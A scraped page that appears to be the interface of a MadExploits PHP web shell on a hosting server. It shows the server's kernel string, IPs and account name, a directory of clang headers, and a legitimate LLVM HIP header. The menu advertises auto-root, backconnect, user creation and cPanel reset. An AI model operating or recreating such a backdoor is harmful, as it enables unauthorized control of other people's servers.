Linux frigo.o2switch.net 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP Thu May 7 23:17:13 UTC 2026 x86_64
Apache
: 109.234.164.159 | : 216.73.216.204
Cant Read [ /etc/named.conf ]
8.3.33
lavi4235
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
llvm17 /
lib /
clang /
17 /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
cuda_wrappers
[ DIR ]
drwxr-xr-x
llvm_libc_wrappers
[ DIR ]
drwxr-xr-x
openmp_wrappers
[ DIR ]
drwxr-xr-x
ppc_wrappers
[ DIR ]
drwxr-xr-x
__clang_cuda_builtin_vars.h
4.78
KB
-rw-r--r--
__clang_cuda_cmath.h
18.06
KB
-rw-r--r--
__clang_cuda_complex_builtins....
9.36
KB
-rw-r--r--
__clang_cuda_device_functions....
56.68
KB
-rw-r--r--
__clang_cuda_intrinsics.h
29.93
KB
-rw-r--r--
__clang_cuda_libdevice_declare...
21.87
KB
-rw-r--r--
__clang_cuda_math.h
15.99
KB
-rw-r--r--
__clang_cuda_math_forward_decl...
8.27
KB
-rw-r--r--
__clang_cuda_runtime_wrapper.h
17.61
KB
-rw-r--r--
__clang_cuda_texture_intrinsic...
31.86
KB
-rw-r--r--
__clang_hip_cmath.h
26.34
KB
-rw-r--r--
__clang_hip_libdevice_declares...
19.87
KB
-rw-r--r--
__clang_hip_math.h
31.96
KB
-rw-r--r--
__clang_hip_runtime_wrapper.h
4.65
KB
-rw-r--r--
__clang_hip_stdlib.h
1.19
KB
-rw-r--r--
__stddef_max_align_t.h
857
B
-rw-r--r--
__wmmintrin_aes.h
5.15
KB
-rw-r--r--
__wmmintrin_pclmul.h
1.99
KB
-rw-r--r--
adxintrin.h
7.37
KB
-rw-r--r--
altivec.h
697.32
KB
-rw-r--r--
ammintrin.h
7.54
KB
-rw-r--r--
amxcomplexintrin.h
6.81
KB
-rw-r--r--
amxfp16intrin.h
1.82
KB
-rw-r--r--
amxintrin.h
21.12
KB
-rw-r--r--
arm64intr.h
993
B
-rw-r--r--
arm_acle.h
25.66
KB
-rw-r--r--
arm_bf16.h
548
B
-rw-r--r--
arm_cde.h
32.67
KB
-rw-r--r--
arm_cmse.h
6.21
KB
-rw-r--r--
arm_fp16.h
16.92
KB
-rw-r--r--
arm_mve.h
1.48
MB
-rw-r--r--
arm_neon.h
2.45
MB
-rw-r--r--
arm_neon_sve_bridge.h
9.48
KB
-rw-r--r--
arm_sme_draft_spec_subject_to_...
60.2
KB
-rw-r--r--
arm_sve.h
1.51
MB
-rw-r--r--
armintr.h
843
B
-rw-r--r--
avx2intrin.h
186.96
KB
-rw-r--r--
avx512bf16intrin.h
10.51
KB
-rw-r--r--
avx512bitalgintrin.h
2.41
KB
-rw-r--r--
avx512bwintrin.h
75.33
KB
-rw-r--r--
avx512cdintrin.h
4.12
KB
-rw-r--r--
avx512dqintrin.h
58.75
KB
-rw-r--r--
avx512erintrin.h
11.83
KB
-rw-r--r--
avx512fintrin.h
382.64
KB
-rw-r--r--
avx512fp16intrin.h
156.63
KB
-rw-r--r--
avx512ifmaintrin.h
2.49
KB
-rw-r--r--
avx512ifmavlintrin.h
4.31
KB
-rw-r--r--
avx512pfintrin.h
4.53
KB
-rw-r--r--
avx512vbmi2intrin.h
13.17
KB
-rw-r--r--
avx512vbmiintrin.h
3.72
KB
-rw-r--r--
avx512vbmivlintrin.h
6.94
KB
-rw-r--r--
avx512vlbf16intrin.h
19.21
KB
-rw-r--r--
avx512vlbitalgintrin.h
4.23
KB
-rw-r--r--
avx512vlbwintrin.h
121.26
KB
-rw-r--r--
avx512vlcdintrin.h
7.66
KB
-rw-r--r--
avx512vldqintrin.h
46.41
KB
-rw-r--r--
avx512vlfp16intrin.h
85.51
KB
-rw-r--r--
avx512vlintrin.h
322.29
KB
-rw-r--r--
avx512vlvbmi2intrin.h
25.72
KB
-rw-r--r--
avx512vlvnniintrin.h
13.13
KB
-rw-r--r--
avx512vlvp2intersectintrin.h
4.44
KB
-rw-r--r--
avx512vnniintrin.h
4.21
KB
-rw-r--r--
avx512vp2intersectintrin.h
2.9
KB
-rw-r--r--
avx512vpopcntdqintrin.h
2
KB
-rw-r--r--
avx512vpopcntdqvlintrin.h
3.31
KB
-rw-r--r--
avxifmaintrin.h
5.75
KB
-rw-r--r--
avxintrin.h
195.41
KB
-rw-r--r--
avxneconvertintrin.h
14.09
KB
-rw-r--r--
avxvnniint16intrin.h
17.41
KB
-rw-r--r--
avxvnniint8intrin.h
18.67
KB
-rw-r--r--
avxvnniintrin.h
10.44
KB
-rw-r--r--
bmi2intrin.h
7.09
KB
-rw-r--r--
bmiintrin.h
14.12
KB
-rw-r--r--
builtins.h
741
B
-rw-r--r--
cet.h
1.49
KB
-rw-r--r--
cetintrin.h
3.27
KB
-rw-r--r--
cldemoteintrin.h
1.18
KB
-rw-r--r--
clflushoptintrin.h
1.17
KB
-rw-r--r--
clwbintrin.h
1.2
KB
-rw-r--r--
clzerointrin.h
1.19
KB
-rw-r--r--
cmpccxaddintrin.h
2.33
KB
-rw-r--r--
cpuid.h
11.01
KB
-rw-r--r--
crc32intrin.h
3.27
KB
-rw-r--r--
emmintrin.h
192.64
KB
-rw-r--r--
enqcmdintrin.h
2.12
KB
-rw-r--r--
f16cintrin.h
5.39
KB
-rw-r--r--
float.h
5.63
KB
-rw-r--r--
fma4intrin.h
6.82
KB
-rw-r--r--
fmaintrin.h
28.4
KB
-rw-r--r--
fxsrintrin.h
2.82
KB
-rw-r--r--
gfniintrin.h
7.57
KB
-rw-r--r--
hexagon_circ_brev_intrinsics.h
15.59
KB
-rw-r--r--
hexagon_protos.h
374.42
KB
-rw-r--r--
hexagon_types.h
130.33
KB
-rw-r--r--
hresetintrin.h
1.36
KB
-rw-r--r--
htmintrin.h
6.14
KB
-rw-r--r--
htmxlintrin.h
9.01
KB
-rw-r--r--
hvx_hexagon_protos.h
254.26
KB
-rw-r--r--
ia32intrin.h
12.72
KB
-rw-r--r--
immintrin.h
23.57
KB
-rw-r--r--
intrin.h
28.22
KB
-rw-r--r--
inttypes.h
2.26
KB
-rw-r--r--
invpcidintrin.h
764
B
-rw-r--r--
iso646.h
656
B
-rw-r--r--
keylockerintrin.h
17.98
KB
-rw-r--r--
larchintrin.h
7.8
KB
-rw-r--r--
limits.h
3.61
KB
-rw-r--r--
lwpintrin.h
5
KB
-rw-r--r--
lzcntintrin.h
3.18
KB
-rw-r--r--
mm3dnow.h
4.5
KB
-rw-r--r--
mm_malloc.h
1.88
KB
-rw-r--r--
mmintrin.h
55.98
KB
-rw-r--r--
module.modulemap
3.33
KB
-rw-r--r--
movdirintrin.h
1.57
KB
-rw-r--r--
msa.h
25.01
KB
-rw-r--r--
mwaitxintrin.h
2.19
KB
-rw-r--r--
nmmintrin.h
709
B
-rw-r--r--
opencl-c-base.h
30.38
KB
-rw-r--r--
opencl-c.h
874.39
KB
-rw-r--r--
pconfigintrin.h
1.19
KB
-rw-r--r--
pkuintrin.h
934
B
-rw-r--r--
pmmintrin.h
10.5
KB
-rw-r--r--
popcntintrin.h
1.82
KB
-rw-r--r--
prfchiintrin.h
2.02
KB
-rw-r--r--
prfchwintrin.h
2.06
KB
-rw-r--r--
ptwriteintrin.h
1.05
KB
-rw-r--r--
raointintrin.h
6.59
KB
-rw-r--r--
rdpruintrin.h
1.59
KB
-rw-r--r--
rdseedintrin.h
2.85
KB
-rw-r--r--
riscv_ntlh.h
855
B
-rw-r--r--
rtmintrin.h
1.25
KB
-rw-r--r--
s390intrin.h
604
B
-rw-r--r--
serializeintrin.h
881
B
-rw-r--r--
sgxintrin.h
1.77
KB
-rw-r--r--
sha512intrin.h
5.95
KB
-rw-r--r--
shaintrin.h
7.37
KB
-rw-r--r--
sifive_vector.h
522
B
-rw-r--r--
sm3intrin.h
7.29
KB
-rw-r--r--
sm4intrin.h
8.2
KB
-rw-r--r--
smmintrin.h
99.32
KB
-rw-r--r--
stdalign.h
911
B
-rw-r--r--
stdarg.h
1.66
KB
-rw-r--r--
stdatomic.h
8.3
KB
-rw-r--r--
stdbool.h
1.04
KB
-rw-r--r--
stddef.h
4.16
KB
-rw-r--r--
stdint.h
32.49
KB
-rw-r--r--
stdnoreturn.h
1.17
KB
-rw-r--r--
tbmintrin.h
3.15
KB
-rw-r--r--
tgmath.h
29.68
KB
-rw-r--r--
tmmintrin.h
29.51
KB
-rw-r--r--
tsxldtrkintrin.h
1.97
KB
-rw-r--r--
uintrintrin.h
4.96
KB
-rw-r--r--
unwind.h
11.21
KB
-rw-r--r--
vadefs.h
1.39
KB
-rw-r--r--
vaesintrin.h
2.46
KB
-rw-r--r--
varargs.h
477
B
-rw-r--r--
vecintrin.h
360.82
KB
-rw-r--r--
velintrin.h
2.1
KB
-rw-r--r--
velintrin_approx.h
3.54
KB
-rw-r--r--
velintrin_gen.h
69.06
KB
-rw-r--r--
vpclmulqdqintrin.h
1.06
KB
-rw-r--r--
waitpkgintrin.h
1.33
KB
-rw-r--r--
wasm_simd128.h
76.25
KB
-rw-r--r--
wbnoinvdintrin.h
749
B
-rw-r--r--
wmmintrin.h
659
B
-rw-r--r--
x86gprintrin.h
2.32
KB
-rw-r--r--
x86intrin.h
1.81
KB
-rw-r--r--
xmmintrin.h
106.73
KB
-rw-r--r--
xopintrin.h
19.96
KB
-rw-r--r--
xsavecintrin.h
2.51
KB
-rw-r--r--
xsaveintrin.h
1.64
KB
-rw-r--r--
xsaveoptintrin.h
1
KB
-rw-r--r--
xsavesintrin.h
1.24
KB
-rw-r--r--
xtestintrin.h
873
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __clang_hip_libdevice_declares.h
/*===---- __clang_hip_libdevice_declares.h - HIP device library decls -------=== * * Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. * See https://llvm.org/LICENSE.txt for license information. * SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception * *===-----------------------------------------------------------------------=== */ #ifndef __CLANG_HIP_LIBDEVICE_DECLARES_H__ #define __CLANG_HIP_LIBDEVICE_DECLARES_H__ #if !defined(__HIPCC_RTC__) && __has_include("hip/hip_version.h") #include "hip/hip_version.h" #endif // __has_include("hip/hip_version.h") #ifdef __cplusplus extern "C" { #endif // BEGIN FLOAT __device__ __attribute__((const)) float __ocml_acos_f32(float); __device__ __attribute__((pure)) float __ocml_acosh_f32(float); __device__ __attribute__((const)) float __ocml_asin_f32(float); __device__ __attribute__((pure)) float __ocml_asinh_f32(float); __device__ __attribute__((const)) float __ocml_atan2_f32(float, float); __device__ __attribute__((const)) float __ocml_atan_f32(float); __device__ __attribute__((pure)) float __ocml_atanh_f32(float); __device__ __attribute__((pure)) float __ocml_cbrt_f32(float); __device__ __attribute__((const)) float __ocml_ceil_f32(float); __device__ __attribute__((const)) __device__ float __ocml_copysign_f32(float, float); __device__ float __ocml_cos_f32(float); __device__ float __ocml_native_cos_f32(float); __device__ __attribute__((pure)) __device__ float __ocml_cosh_f32(float); __device__ float __ocml_cospi_f32(float); __device__ float __ocml_i0_f32(float); __device__ float __ocml_i1_f32(float); __device__ __attribute__((pure)) float __ocml_erfc_f32(float); __device__ __attribute__((pure)) float __ocml_erfcinv_f32(float); __device__ __attribute__((pure)) float __ocml_erfcx_f32(float); __device__ __attribute__((pure)) float __ocml_erf_f32(float); __device__ __attribute__((pure)) float __ocml_erfinv_f32(float); __device__ __attribute__((pure)) float __ocml_exp10_f32(float); __device__ __attribute__((pure)) float __ocml_native_exp10_f32(float); __device__ __attribute__((pure)) float __ocml_exp2_f32(float); __device__ __attribute__((pure)) float __ocml_exp_f32(float); __device__ __attribute__((pure)) float __ocml_native_exp_f32(float); __device__ __attribute__((pure)) float __ocml_expm1_f32(float); __device__ __attribute__((const)) float __ocml_fabs_f32(float); __device__ __attribute__((const)) float __ocml_fdim_f32(float, float); __device__ __attribute__((const)) float __ocml_floor_f32(float); __device__ __attribute__((const)) float __ocml_fma_f32(float, float, float); __device__ __attribute__((const)) float __ocml_fmax_f32(float, float); __device__ __attribute__((const)) float __ocml_fmin_f32(float, float); __device__ __attribute__((const)) __device__ float __ocml_fmod_f32(float, float); __device__ float __ocml_frexp_f32(float, __attribute__((address_space(5))) int *); __device__ __attribute__((const)) float __ocml_hypot_f32(float, float); __device__ __attribute__((const)) int __ocml_ilogb_f32(float); __device__ __attribute__((const)) int __ocml_isfinite_f32(float); __device__ __attribute__((const)) int __ocml_isinf_f32(float); __device__ __attribute__((const)) int __ocml_isnan_f32(float); __device__ float __ocml_j0_f32(float); __device__ float __ocml_j1_f32(float); __device__ __attribute__((const)) float __ocml_ldexp_f32(float, int); __device__ float __ocml_lgamma_f32(float); __device__ __attribute__((pure)) float __ocml_log10_f32(float); __device__ __attribute__((pure)) float __ocml_native_log10_f32(float); __device__ __attribute__((pure)) float __ocml_log1p_f32(float); __device__ __attribute__((pure)) float __ocml_log2_f32(float); __device__ __attribute__((pure)) float __ocml_native_log2_f32(float); __device__ __attribute__((const)) float __ocml_logb_f32(float); __device__ __attribute__((pure)) float __ocml_log_f32(float); __device__ __attribute__((pure)) float __ocml_native_log_f32(float); __device__ float __ocml_modf_f32(float, __attribute__((address_space(5))) float *); __device__ __attribute__((const)) float __ocml_nearbyint_f32(float); __device__ __attribute__((const)) float __ocml_nextafter_f32(float, float); __device__ __attribute__((const)) float __ocml_len3_f32(float, float, float); __device__ __attribute__((const)) float __ocml_len4_f32(float, float, float, float); __device__ __attribute__((pure)) float __ocml_ncdf_f32(float); __device__ __attribute__((pure)) float __ocml_ncdfinv_f32(float); __device__ __attribute__((pure)) float __ocml_pow_f32(float, float); __device__ __attribute__((pure)) float __ocml_pown_f32(float, int); __device__ __attribute__((pure)) float __ocml_rcbrt_f32(float); __device__ __attribute__((const)) float __ocml_remainder_f32(float, float); __device__ float __ocml_remquo_f32(float, float, __attribute__((address_space(5))) int *); __device__ __attribute__((const)) float __ocml_rhypot_f32(float, float); __device__ __attribute__((const)) float __ocml_rint_f32(float); __device__ __attribute__((const)) float __ocml_rlen3_f32(float, float, float); __device__ __attribute__((const)) float __ocml_rlen4_f32(float, float, float, float); __device__ __attribute__((const)) float __ocml_round_f32(float); __device__ __attribute__((pure)) float __ocml_rsqrt_f32(float); __device__ __attribute__((const)) float __ocml_scalb_f32(float, float); __device__ __attribute__((const)) float __ocml_scalbn_f32(float, int); __device__ __attribute__((const)) int __ocml_signbit_f32(float); __device__ float __ocml_sincos_f32(float, __attribute__((address_space(5))) float *); __device__ float __ocml_sincospi_f32(float, __attribute__((address_space(5))) float *); __device__ float __ocml_sin_f32(float); __device__ float __ocml_native_sin_f32(float); __device__ __attribute__((pure)) float __ocml_sinh_f32(float); __device__ float __ocml_sinpi_f32(float); __device__ __attribute__((const)) float __ocml_sqrt_f32(float); __device__ __attribute__((const)) float __ocml_native_sqrt_f32(float); __device__ float __ocml_tan_f32(float); __device__ __attribute__((pure)) float __ocml_tanh_f32(float); __device__ float __ocml_tgamma_f32(float); __device__ __attribute__((const)) float __ocml_trunc_f32(float); __device__ float __ocml_y0_f32(float); __device__ float __ocml_y1_f32(float); // BEGIN INTRINSICS __device__ __attribute__((const)) float __ocml_add_rte_f32(float, float); __device__ __attribute__((const)) float __ocml_add_rtn_f32(float, float); __device__ __attribute__((const)) float __ocml_add_rtp_f32(float, float); __device__ __attribute__((const)) float __ocml_add_rtz_f32(float, float); __device__ __attribute__((const)) float __ocml_sub_rte_f32(float, float); __device__ __attribute__((const)) float __ocml_sub_rtn_f32(float, float); __device__ __attribute__((const)) float __ocml_sub_rtp_f32(float, float); __device__ __attribute__((const)) float __ocml_sub_rtz_f32(float, float); __device__ __attribute__((const)) float __ocml_mul_rte_f32(float, float); __device__ __attribute__((const)) float __ocml_mul_rtn_f32(float, float); __device__ __attribute__((const)) float __ocml_mul_rtp_f32(float, float); __device__ __attribute__((const)) float __ocml_mul_rtz_f32(float, float); __device__ __attribute__((const)) float __ocml_div_rte_f32(float, float); __device__ __attribute__((const)) float __ocml_div_rtn_f32(float, float); __device__ __attribute__((const)) float __ocml_div_rtp_f32(float, float); __device__ __attribute__((const)) float __ocml_div_rtz_f32(float, float); __device__ __attribute__((const)) float __ocml_sqrt_rte_f32(float); __device__ __attribute__((const)) float __ocml_sqrt_rtn_f32(float); __device__ __attribute__((const)) float __ocml_sqrt_rtp_f32(float); __device__ __attribute__((const)) float __ocml_sqrt_rtz_f32(float); __device__ __attribute__((const)) float __ocml_fma_rte_f32(float, float, float); __device__ __attribute__((const)) float __ocml_fma_rtn_f32(float, float, float); __device__ __attribute__((const)) float __ocml_fma_rtp_f32(float, float, float); __device__ __attribute__((const)) float __ocml_fma_rtz_f32(float, float, float); // END INTRINSICS // END FLOAT // BEGIN DOUBLE __device__ __attribute__((const)) double __ocml_acos_f64(double); __device__ __attribute__((pure)) double __ocml_acosh_f64(double); __device__ __attribute__((const)) double __ocml_asin_f64(double); __device__ __attribute__((pure)) double __ocml_asinh_f64(double); __device__ __attribute__((const)) double __ocml_atan2_f64(double, double); __device__ __attribute__((const)) double __ocml_atan_f64(double); __device__ __attribute__((pure)) double __ocml_atanh_f64(double); __device__ __attribute__((pure)) double __ocml_cbrt_f64(double); __device__ __attribute__((const)) double __ocml_ceil_f64(double); __device__ __attribute__((const)) double __ocml_copysign_f64(double, double); __device__ double __ocml_cos_f64(double); __device__ __attribute__((pure)) double __ocml_cosh_f64(double); __device__ double __ocml_cospi_f64(double); __device__ double __ocml_i0_f64(double); __device__ double __ocml_i1_f64(double); __device__ __attribute__((pure)) double __ocml_erfc_f64(double); __device__ __attribute__((pure)) double __ocml_erfcinv_f64(double); __device__ __attribute__((pure)) double __ocml_erfcx_f64(double); __device__ __attribute__((pure)) double __ocml_erf_f64(double); __device__ __attribute__((pure)) double __ocml_erfinv_f64(double); __device__ __attribute__((pure)) double __ocml_exp10_f64(double); __device__ __attribute__((pure)) double __ocml_exp2_f64(double); __device__ __attribute__((pure)) double __ocml_exp_f64(double); __device__ __attribute__((pure)) double __ocml_expm1_f64(double); __device__ __attribute__((const)) double __ocml_fabs_f64(double); __device__ __attribute__((const)) double __ocml_fdim_f64(double, double); __device__ __attribute__((const)) double __ocml_floor_f64(double); __device__ __attribute__((const)) double __ocml_fma_f64(double, double, double); __device__ __attribute__((const)) double __ocml_fmax_f64(double, double); __device__ __attribute__((const)) double __ocml_fmin_f64(double, double); __device__ __attribute__((const)) double __ocml_fmod_f64(double, double); __device__ double __ocml_frexp_f64(double, __attribute__((address_space(5))) int *); __device__ __attribute__((const)) double __ocml_hypot_f64(double, double); __device__ __attribute__((const)) int __ocml_ilogb_f64(double); __device__ __attribute__((const)) int __ocml_isfinite_f64(double); __device__ __attribute__((const)) int __ocml_isinf_f64(double); __device__ __attribute__((const)) int __ocml_isnan_f64(double); __device__ double __ocml_j0_f64(double); __device__ double __ocml_j1_f64(double); __device__ __attribute__((const)) double __ocml_ldexp_f64(double, int); __device__ double __ocml_lgamma_f64(double); __device__ __attribute__((pure)) double __ocml_log10_f64(double); __device__ __attribute__((pure)) double __ocml_log1p_f64(double); __device__ __attribute__((pure)) double __ocml_log2_f64(double); __device__ __attribute__((const)) double __ocml_logb_f64(double); __device__ __attribute__((pure)) double __ocml_log_f64(double); __device__ double __ocml_modf_f64(double, __attribute__((address_space(5))) double *); __device__ __attribute__((const)) double __ocml_nearbyint_f64(double); __device__ __attribute__((const)) double __ocml_nextafter_f64(double, double); __device__ __attribute__((const)) double __ocml_len3_f64(double, double, double); __device__ __attribute__((const)) double __ocml_len4_f64(double, double, double, double); __device__ __attribute__((pure)) double __ocml_ncdf_f64(double); __device__ __attribute__((pure)) double __ocml_ncdfinv_f64(double); __device__ __attribute__((pure)) double __ocml_pow_f64(double, double); __device__ __attribute__((pure)) double __ocml_pown_f64(double, int); __device__ __attribute__((pure)) double __ocml_rcbrt_f64(double); __device__ __attribute__((const)) double __ocml_remainder_f64(double, double); __device__ double __ocml_remquo_f64(double, double, __attribute__((address_space(5))) int *); __device__ __attribute__((const)) double __ocml_rhypot_f64(double, double); __device__ __attribute__((const)) double __ocml_rint_f64(double); __device__ __attribute__((const)) double __ocml_rlen3_f64(double, double, double); __device__ __attribute__((const)) double __ocml_rlen4_f64(double, double, double, double); __device__ __attribute__((const)) double __ocml_round_f64(double); __device__ __attribute__((pure)) double __ocml_rsqrt_f64(double); __device__ __attribute__((const)) double __ocml_scalb_f64(double, double); __device__ __attribute__((const)) double __ocml_scalbn_f64(double, int); __device__ __attribute__((const)) int __ocml_signbit_f64(double); __device__ double __ocml_sincos_f64(double, __attribute__((address_space(5))) double *); __device__ double __ocml_sincospi_f64(double, __attribute__((address_space(5))) double *); __device__ double __ocml_sin_f64(double); __device__ __attribute__((pure)) double __ocml_sinh_f64(double); __device__ double __ocml_sinpi_f64(double); __device__ __attribute__((const)) double __ocml_sqrt_f64(double); __device__ double __ocml_tan_f64(double); __device__ __attribute__((pure)) double __ocml_tanh_f64(double); __device__ double __ocml_tgamma_f64(double); __device__ __attribute__((const)) double __ocml_trunc_f64(double); __device__ double __ocml_y0_f64(double); __device__ double __ocml_y1_f64(double); // BEGIN INTRINSICS __device__ __attribute__((const)) double __ocml_add_rte_f64(double, double); __device__ __attribute__((const)) double __ocml_add_rtn_f64(double, double); __device__ __attribute__((const)) double __ocml_add_rtp_f64(double, double); __device__ __attribute__((const)) double __ocml_add_rtz_f64(double, double); __device__ __attribute__((const)) double __ocml_sub_rte_f64(double, double); __device__ __attribute__((const)) double __ocml_sub_rtn_f64(double, double); __device__ __attribute__((const)) double __ocml_sub_rtp_f64(double, double); __device__ __attribute__((const)) double __ocml_sub_rtz_f64(double, double); __device__ __attribute__((const)) double __ocml_mul_rte_f64(double, double); __device__ __attribute__((const)) double __ocml_mul_rtn_f64(double, double); __device__ __attribute__((const)) double __ocml_mul_rtp_f64(double, double); __device__ __attribute__((const)) double __ocml_mul_rtz_f64(double, double); __device__ __attribute__((const)) double __ocml_div_rte_f64(double, double); __device__ __attribute__((const)) double __ocml_div_rtn_f64(double, double); __device__ __attribute__((const)) double __ocml_div_rtp_f64(double, double); __device__ __attribute__((const)) double __ocml_div_rtz_f64(double, double); __device__ __attribute__((const)) double __ocml_sqrt_rte_f64(double); __device__ __attribute__((const)) double __ocml_sqrt_rtn_f64(double); __device__ __attribute__((const)) double __ocml_sqrt_rtp_f64(double); __device__ __attribute__((const)) double __ocml_sqrt_rtz_f64(double); __device__ __attribute__((const)) double __ocml_fma_rte_f64(double, double, double); __device__ __attribute__((const)) double __ocml_fma_rtn_f64(double, double, double); __device__ __attribute__((const)) double __ocml_fma_rtp_f64(double, double, double); __device__ __attribute__((const)) double __ocml_fma_rtz_f64(double, double, double); __device__ __attribute__((const)) _Float16 __ocml_ceil_f16(_Float16); __device__ _Float16 __ocml_cos_f16(_Float16); __device__ __attribute__((const)) _Float16 __ocml_cvtrtn_f16_f32(float); __device__ __attribute__((const)) _Float16 __ocml_cvtrtp_f16_f32(float); __device__ __attribute__((const)) _Float16 __ocml_cvtrtz_f16_f32(float); __device__ __attribute__((pure)) _Float16 __ocml_exp_f16(_Float16); __device__ __attribute__((pure)) _Float16 __ocml_exp10_f16(_Float16); __device__ __attribute__((pure)) _Float16 __ocml_exp2_f16(_Float16); __device__ __attribute__((const)) _Float16 __ocml_floor_f16(_Float16); __device__ __attribute__((const)) _Float16 __ocml_fma_f16(_Float16, _Float16, _Float16); __device__ __attribute__((const)) _Float16 __ocml_fmax_f16(_Float16, _Float16); __device__ __attribute__((const)) _Float16 __ocml_fmin_f16(_Float16, _Float16); __device__ __attribute__((const)) _Float16 __ocml_fabs_f16(_Float16); __device__ __attribute__((const)) int __ocml_isinf_f16(_Float16); __device__ __attribute__((const)) int __ocml_isnan_f16(_Float16); __device__ __attribute__((pure)) _Float16 __ocml_log_f16(_Float16); __device__ __attribute__((pure)) _Float16 __ocml_log10_f16(_Float16); __device__ __attribute__((pure)) _Float16 __ocml_log2_f16(_Float16); __device__ __attribute__((const)) _Float16 __ocml_rint_f16(_Float16); __device__ __attribute__((const)) _Float16 __ocml_rsqrt_f16(_Float16); __device__ _Float16 __ocml_sin_f16(_Float16); __device__ __attribute__((const)) _Float16 __ocml_sqrt_f16(_Float16); __device__ __attribute__((const)) _Float16 __ocml_trunc_f16(_Float16); __device__ __attribute__((pure)) _Float16 __ocml_pown_f16(_Float16, int); typedef _Float16 __2f16 __attribute__((ext_vector_type(2))); typedef short __2i16 __attribute__((ext_vector_type(2))); // We need to match C99's bool and get an i1 in the IR. #ifdef __cplusplus typedef bool __ockl_bool; #else typedef _Bool __ockl_bool; #endif __device__ __attribute__((const)) float __ockl_fdot2(__2f16 a, __2f16 b, float c, __ockl_bool s); __device__ __attribute__((const)) __2f16 __ocml_ceil_2f16(__2f16); __device__ __attribute__((const)) __2f16 __ocml_fabs_2f16(__2f16); __device__ __2f16 __ocml_cos_2f16(__2f16); __device__ __attribute__((pure)) __2f16 __ocml_exp_2f16(__2f16); __device__ __attribute__((pure)) __2f16 __ocml_exp10_2f16(__2f16); __device__ __attribute__((pure)) __2f16 __ocml_exp2_2f16(__2f16); __device__ __attribute__((const)) __2f16 __ocml_floor_2f16(__2f16); __device__ __attribute__((const)) __2f16 __ocml_fma_2f16(__2f16, __2f16, __2f16); __device__ __attribute__((const)) __2i16 __ocml_isinf_2f16(__2f16); __device__ __attribute__((const)) __2i16 __ocml_isnan_2f16(__2f16); __device__ __attribute__((pure)) __2f16 __ocml_log_2f16(__2f16); __device__ __attribute__((pure)) __2f16 __ocml_log10_2f16(__2f16); __device__ __attribute__((pure)) __2f16 __ocml_log2_2f16(__2f16); #if HIP_VERSION_MAJOR * 100 + HIP_VERSION_MINOR >= 560 #define __DEPRECATED_SINCE_HIP_560(X) __attribute__((deprecated(X))) #else #define __DEPRECATED_SINCE_HIP_560(X) #endif // Deprecated, should be removed when rocm releases using it are no longer // relevant. __DEPRECATED_SINCE_HIP_560("use ((_Float16)1.0) / ") __device__ inline _Float16 __llvm_amdgcn_rcp_f16(_Float16 x) { return ((_Float16)1.0f) / x; } __DEPRECATED_SINCE_HIP_560("use ((__2f16)1.0) / ") __device__ inline __2f16 __llvm_amdgcn_rcp_2f16(__2f16 __x) { return ((__2f16)1.0f) / __x; } #undef __DEPRECATED_SINCE_HIP_560 __device__ __attribute__((const)) __2f16 __ocml_rint_2f16(__2f16); __device__ __attribute__((const)) __2f16 __ocml_rsqrt_2f16(__2f16); __device__ __2f16 __ocml_sin_2f16(__2f16); __device__ __attribute__((const)) __2f16 __ocml_sqrt_2f16(__2f16); __device__ __attribute__((const)) __2f16 __ocml_trunc_2f16(__2f16); __device__ __attribute__((const)) __2f16 __ocml_pown_2f16(__2f16, __2i16); #ifdef __cplusplus } // extern "C" #endif #endif // __CLANG_HIP_LIBDEVICE_DECLARES_H__
Close